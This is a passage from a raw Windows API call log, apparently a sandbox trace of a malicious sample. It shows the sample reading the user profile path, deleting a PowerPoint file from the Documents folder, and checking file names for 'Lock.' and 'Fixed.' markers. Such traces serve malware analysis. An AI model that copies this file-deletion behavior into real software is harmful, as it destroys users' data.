[0265.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0265.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0265.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0265.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0265.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0265.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.953] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0265.953] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0265.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0265.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0265.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0265.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0265.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4a) returned 0x2e558d8 [0265.954] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Lci9q.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Lci9q.pptx", lpFilePart=0x8cedf4*="Lci9q.pptx") returned 0x24 [0265.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0265.954] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Lci9q.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lci9q.pptx")) returned 0x20 [0265.955] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Lci9q.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a320, ftCreationTime.dwHighDateTime=0x1d5d8fd, ftLastAccessTime.dwLowDateTime=0x568f9170, ftLastAccessTime.dwHighDateTime=0x1d567a2, ftLastWriteTime.dwLowDateTime=0x568f9170, ftLastWriteTime.dwHighDateTime=0x1d567a2, nFileSizeHigh=0x0, nFileSizeLow=0xd8c0, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Lci9q.pptx", cAlternateFileName="LCI9Q~1.PPT")) returned 0xa87490 [0265.955] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Lci9q.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lci9q.pptx")) returned 1 [0265.957] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a320, ftCreationTime.dwHighDateTime=0x1d5d8fd, ftLastAccessTime.dwLowDateTime=0x568f9170, ftLastAccessTime.dwHighDateTime=0x1d567a2, ftLastWriteTime.dwLowDateTime=0x568f9170, ftLastWriteTime.dwHighDateTime=0x1d567a2, nFileSizeHigh=0x0, nFileSizeLow=0xd8c0, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Lci9q.pptx", cAlternateFileName="LCI9Q~1.PPT")) returned 0 [0265.957] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0265.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0265.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.957] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0265.958] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0265.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0265.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0265.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0265.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0265.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4a) returned 0x2e558d8 [0265.959] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Lci9q.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Lci9q.pptx", lpFilePart=0x8cf650*="Lci9q.pptx") returned 0x24 [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0265.959] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Lci9q.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lci9q.pptx")) returned 0xffffffff [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.959] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.959] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.959] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0265.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0265.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0265.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0265.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0265.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0265.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0265.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MvKsZ2f3N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vKsZ2f3N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KsZ2f3N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sZ2f3N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z2f3N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2f3N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f3N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SAK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AK.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0265.961] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0265.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0265.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0265.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0265.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x9779f8 [0265.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MvKsZ2f3N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vKsZ2f3N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KsZ2f3N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sZ2f3N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z2f3N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2f3N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f3N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SAK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AK.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, 